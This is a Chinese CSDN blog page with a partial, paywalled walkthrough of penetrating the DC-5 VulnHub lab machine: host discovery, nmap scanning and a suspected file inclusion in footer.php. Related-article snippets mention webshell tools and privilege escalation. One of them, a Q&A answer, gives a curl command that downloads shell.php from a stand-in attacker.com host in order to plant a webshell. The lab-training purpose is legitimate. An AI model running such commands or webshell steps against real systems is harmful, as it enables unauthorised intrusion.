DC-5主机渗透

最新推荐文章于 2024-04-29 10:08:59 发布
最新推荐文章于 2024-04-29 10:08:59 发布
阅读量196 收藏 1
点赞数
分类专栏: DC系列靶机 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65920814/article/details/130868977
版权

提示:本文章主要讲解DC-5主机渗透全过程

前言

本文章主要讲解DC-4主机渗透全过程

以下是本篇文章正文内容可供参考

一、配置

DC-5主机渗透

网络适配器打开VMnet8;

在VMware中文件 -- 打开 -- 导入DC-5;

开启kali、DC-4.

kali作为攻击机 ip地址:192.168.159.128

DC-5 ip:192.168.159.133

注:确保靶机和攻击机在同一网段,设置同一网络连接方式:kali、DC-4虚拟机设置-网络适配器使用NAT模式.

二、步骤

1.搜集主机ip:

arp-scan -l

 

2.搜集目标靶机的相关信息

nmap -sV -p- 192.168.159.133


发现80端口的服务及版本:nginx 1.6.2

3.浏览器访问80端口服务

 在Contact页面 随意输入内容

提交

 刷新发现Copyright处有变化

4.用whatweb,dirb扫描,无果

5.用御剑扫描

发现footer.php页面

猜测存在文件包含漏洞,链接为h

最低0.47元/天 解锁文章
阿雯183
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-5靶机渗透测试
读书 买花 长大
03-14 1191
DC-5
DC-5靶机渗透测试(文件包含漏洞)
single_g_l的博客
03-26 8919
一、 环境 靶机: 192.168.1.127 攻击机:192.168.1.209 二、信息收集 1、主机发现&端口扫描 nmap -sP 192.168.1.0/24 #发现存活主机 nmap -sS A 192.168.1.127 #开放端口 2、访问80端口 3、尝试提交留言,刷新页面,“Copyright © 2017”动态变化 刷新页面,“Copyright © 2017”动态变化 4、dirsearch 扫描敏感目录 dirsearch .
把手教你如何进行内网渗透
最新发布
Python84310366的博客
04-29 569
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
DAY27:主机渗透测试
qq_49433473的博客
08-10 2478
主机渗透测试、主机渗透常用端口、服务默认端口及爆破使用、主机渗透漏洞实例利用 向日葵rce示例,redis弱口令爆破及getshell
DC-5渗透实战】
qq_23347209的博客
10-02 1730
其实后续操作呢就是阅读这个.sh文件内容并且按流程操作就可以了简单说明:需要分别创建.c文件并且进行编译后传到目标靶机服务器上,最后执行.runme.sh文件就可以提权到root。Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式。在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资。源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能。使用find命令查看可以利用的权限执行。
主机 渗透
lin__ying的博客
03-14 400
1:kali靶机:Windows Server 2003。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-4-Web渗透测试靶机
01-19
DC-4
DC-DC变换器Simulink仿真模型
08-07
本人在Simulink平台搭建的DC-DC变换器仿真模型,可以使用构成你自己模型的一部分。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5428
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
内网安全---边界主机渗透
gental_z的博客
01-22 1076
一、简单环境搭建 一台VPS,一台边界服务器OWASP,一台内部服务器Ubuntu Server 网络拓扑如图所示: 关于环境的部署,在OWSAP服务器中设置两张网卡,一张设置外部IP,另外一张设置内部IP。 # 具体配置在/etc/network/interface # 这里设置静态IP auto eth0 iface eth0 inet static address 192.168.101.100 netmask 255.255.255.0 gateway 192.168.101.2 auto et
DC-5渗透测试教程详解
城下深蓝的博客
02-19 992
DC-5渗透测试教程详解
DC-5靶场渗透
一纸荒芜的博客
07-04 1529
DC-5 靶场
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5906
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub 之 DC-5提权
ST0new的博客
07-23 681
文章目录前言作者描述复现环境开始复现查看flag 前言 本靶机只做学习使用,不要将其利用于非法途径。 终于来到了倒数第二关,这一关将难度增加,所以我们需要借助搜索工具来帮助我们完成 作者描述 DC-5是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 这个计划是为了让DC-5更上一层楼,所以这对初学者来说可能不太好,但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4830
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
DC-5
per_se_veran_ce的博客
10-07 450
1、发现目标主机,信息收集 开放端口80,111,59888 2、访问80端口 尝试提交留言 刷新一次年份变化一次 http://192.168.168.203/thankyou.php?firstname=1&lastname=1&country=australia&subject=1 3、御剑扫描敏感目录 4、逐步去试,发现footer.php...
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值